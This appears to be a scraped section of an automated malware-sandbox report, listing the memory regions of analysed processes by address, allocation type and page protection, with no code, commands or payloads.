stack
|
page read and write
|
||
|
2B28000
|
stack
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F70AF3000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
1F13B80B000
|
heap
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
7FF887C70000
|
trusted library allocation
|
page read and write
|
||
|
1F701C61000
|
trusted library allocation
|
page read and write
|
||
|
1F13B9D0000
|
heap
|
page read and write
|
||
|
24F715C4000
|
heap
|
page read and write
|
||
|
7661000
|
heap
|
page read and write
|
||
|
8770000
|
heap
|
page read and write
|
||
|
7FF887A66000
|
trusted library allocation
|
page read and write
|
||
|
7FF8879B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
B0B6000
|
direct allocation
|
page execute and read and write
|
||
|
5AB1000
|
trusted library allocation
|
page read and write
|
||
|
1F76B8F0000
|
trusted library allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
1F70079B000
|
trusted library allocation
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
71E0000
|
direct allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
1F7004F2000
|
trusted library allocation
|
page read and write
|
||
|
24F717E4000
|
heap
|
page read and write
|
||
|
7280000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7FF887BA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F715E9000
|
heap
|
page read and write
|
||
|
1F76C0F0000
|
heap
|
page execute and read and write
|
||
|
94C0000
|
heap
|
page readonly
|
||
|
78CD000
|
stack
|
page read and write
|
||
|
1F769EC0000
|
heap
|
page read and write
|
||
|
1F70176B000
|
trusted library allocation
|
page read and write
|
||
|
87A6000
|
heap
|
page read and write
|
||
|
43919CA000
|
stack
|
page read and write
|
||
|
24F6E8B0000
|
remote allocation
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
3489000
|
heap
|
page read and write
|
||
|
7510000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
4BF6000
|
trusted library allocation
|
page read and write
|
||
|
1F13BB40000
|
heap
|
page read and write
|
||
|
1F76C2BD000
|
heap
|
page read and write
|
||
|
1F769F7C000
|
heap
|
page read and write
|
||
|
7FF8879C0000
|
trusted library allocation
|
page read and write
|
||
|
74C6000
|
remote allocation
|
page execute and read and write
|
||
|
71F0000
|
direct allocation
|
page read and write
|
||
|
4AA1000
|
trusted library allocation
|
page read and write
|
||
|
713E000
|
stack
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
2F4E000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7FF887C60000
|
trusted library allocation
|
page read and write
|
||
|
4390EFB000
|
stack
|
page read and write
|
||
|
5B02000
|
trusted library allocation
|
page read and write
|
||
|
71B0000
|
direct allocation
|
page read and write
|
||
|
24F708E1000
|
heap
|
page read and write
|
||
|
7FF887B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
4391A4B000
|
stack
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
1F700225000
|
trusted library allocation
|
page read and write
|
||
|
2BED000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
1F76C260000
|
heap
|
page read and write
|
||
|
1F76BEC5000
|
heap
|
page read and write
|
||
|
7FF8879B4000
|
trusted library allocation
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
24F710E2000
|
heap
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
24F707E1000
|
heap
|
page read and write
|
||
|
727B000
|
stack
|
page read and write
|
||
|
43905AE000
|
stack
|
page read and write
|
||
|
24F6E8B0000
|
remote allocation
|
page read and write
|
||
|
43904A3000
|
stack
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
319B000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
1F76C250000
|
heap
|
page read and write
|
||
|
D8B6000
|
direct allocation
|
page execute and read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
1F701768000
|
trusted library allocation
|
page read and write
|
||
|
74BE000
|
stack
|
page read and write
|
||
|
83F0000
|
heap
|
page read and write
|
||
|
439052E000
|
stack
|
page read and write
|
||
|
2FD8000
|
heap
|
page read and write
|
||
|
3180000
|
trusted library section
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
877A000
|
heap
|
page read and write
|
||
|
1F76C2DF000
|
heap
|
page read and write
|
||
|
24F707E1000
|
heap
|
page read and write
|
||
|
33B0000
|
heap
|
page readonly
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
1F76B860000
|
trusted library section
|
page read and write
|
||
|
24F6E937000
|
heap
|
page read and write
|
||
|
AFD000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F715D1000
|
heap
|
page read and write
|
||
|
1F7007A6000
|
trusted library allocation
|
page read and write
|
||
|
7FF887C40000
|
trusted library allocation
|
page read and write
|
||
|
7FE000
|
unkown
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7FF887D10000
|
trusted library allocation
|
page read and write
|
||
|
7FF887A96000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887C00000
|
trusted library allocation
|
page read and write
|
||
|
89AE000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
32DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F76B890000
|
trusted library allocation
|
page read and write
|
||
|
24F71428000
|
heap
|
page read and write
|
||
|
7FF887B61000
|
trusted library allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F715F1000
|
heap
|
page read and write
|
||
|
8790000
|
heap
|
page read and write
|
||
|
43908FC000
|
stack
|
page read and write
|
||
|
7FF887C10000
|
trusted library allocation
|
page read and write
|
||
|
24F70AF3000
|
heap
|
page read and write
|
||
|
7FF887CD0000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
7FF887A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F70B6E000
|
heap
|
page read and write
|
||
|
1F76B922000
|
trusted library allocation
|
page read and write
|
||
|
92B6000
|
direct allocation
|
page execute and read and write
|
||
|
8530000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
94E0000
|
direct allocation
|
page read and write
|
||
|
1F76B8A4000
|
heap
|
page read and write
|
||
|
9CB6000
|
direct allocation
|
page execute and read and write
|
||
|
24F6E953000
|
heap
|
page read and write
|
||
|
86AC000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
32C9000
|
trusted library allocation
|
page read and write
|
||
|
7290000
|
heap
|
page read and write
|
||
|
24F70F48000
|
heap
|
page read and write
|
||
|
24F71617000
|
heap
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
24F70F49000
|
heap
|
page read and write
|
||
|
94BF000
|
stack
|
page read and write
|
||
|
7FF887CF0000
|
trusted library allocation
|
page read and write
|
||
|
7180000
|
direct allocation
|
page read and write
|
||
|
24F707CF000
|
heap
|
page read and write
|
||
|
7FF887CE0000
|
trusted library allocation
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
24F71421000
|
heap
|
page read and write
|
||
|
91B0000
|
heap
|
page read and write
|
||
|
1F701E57000
|
trusted library allocation
|
page read and write
|
||
|
89EE000
|
stack
|
page read and write
|
||
|
7FF887C90000
|
trusted library allocation
|
page read and write
|
||
|
1F76C27B000
|
heap
|
page read and write
|
||
|
8A00000
|
trusted library allocation
|
page read and write
|
||
|
2DAF000
|
unkown
|
page read and write
|
||
|
32BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
31CE000
|
heap
|
page read and write
|
||
|
1F13B780000
|
heap
|
page read and write
|
||
|
42C6000
|
remote allocation
|
page execute and read and write
|
||
|
24F6E930000
|
heap
|
page read and write
|
||
|
754A000
|
heap
|
page read and write
|
||
|
91FE000
|
stack
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page execute and read and write
|
||
|
32C0000
|
trusted library allocation
|
page read and write
|
||
|
8A10000
|
trusted library allocation
|
page read and write
|
||
|
24F715E1000
|
heap
|
page read and write
|
||
|
1F76B8B0000
|
heap
|
page readonly
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
1F13B790000
|
heap
|
page read and write
|
||
|
A6B6000
|
direct allocation
|
page execute and read and write
|
||
|
947E000
|
stack
|
page read and write
|
||
|
1F76B8A0000
|
heap
|
page read and write
|
||
|
4B00000
|
trusted library allocation
|
page read and write
|
||
|
345E000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
6E6F000
|
stack
|
page read and write
|
||
|
24F71438000
|
heap
|
page read and write
|
||
|
56C6000
|
remote allocation
|
page execute and read and write
|
||
|
439194D000
|
stack
|
page read and write
|
||
|
24F71444000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F7144A000
|
heap
|
page read and write
|
||
|
1F769F38000
|
heap
|
page read and write
|
||
|
75A5000
|
heap
|
page read and write
|
||
|
1F769F52000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
1F710010000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
|
2AEC000
|
stack
|
page read and write
|
||
|
1F769F34000
|
heap
|
page read and write
|
||
|
7FF8879B2000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
heap
|
page execute and read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
|
309F000
|
stack
|
page read and write
|
||
|
24F70F48000
|
heap
|
page read and write
|
||
|
7FF887B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
24F71074000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7FF887C30000
|
trusted library allocation
|
page read and write
|
||
|
1F7004C8000
|
trusted library allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
C0E000
|
stack
|
page read and write
|
||
|
1F76C284000
|
heap
|
page read and write
|
||
|
1F76C2E3000
|
heap
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
87A2000
|
heap
|
page read and write
|
||
|
24F707E9000
|
heap
|
page read and write
|
||
|
7FF887B92000
|
trusted library allocation
|
page read and write
|
||
|
24F70F49000
|
heap
|
page read and write
|
||
|
94D0000
|
direct allocation
|
page read and write
|
||
|
32D0000
|
trusted library allocation
|
page read and write
|
||
|
4390DFE000
|
stack
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
4391883000
|
stack
|
page read and write
|
||
|
8A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
439087F000
|
stack
|
page read and write
|
||
|
4160000
|
remote allocation
|
page execute and read and write
|
||
|
2ECD000
|
stack
|
page read and write
|
||
|
1F701C59000
|
trusted library allocation
|
page read and write
|
||
|
2E8C000
|
stack
|
page read and write
|
||
|
4CC6000
|
remote allocation
|
page execute and read and write
|
||
|
8799000
|
heap
|
page read and write
|
||
|
24F70EF8000
|
heap
|
page read and write
|
||
|
73D000
|
stack
|
page read and write
|
||
|
24F7143C000
|
heap
|
page read and write
|
||
|
1F700083000
|
trusted library allocation
|
page read and write
|
There are 451 hidden memdumps, click here to show them.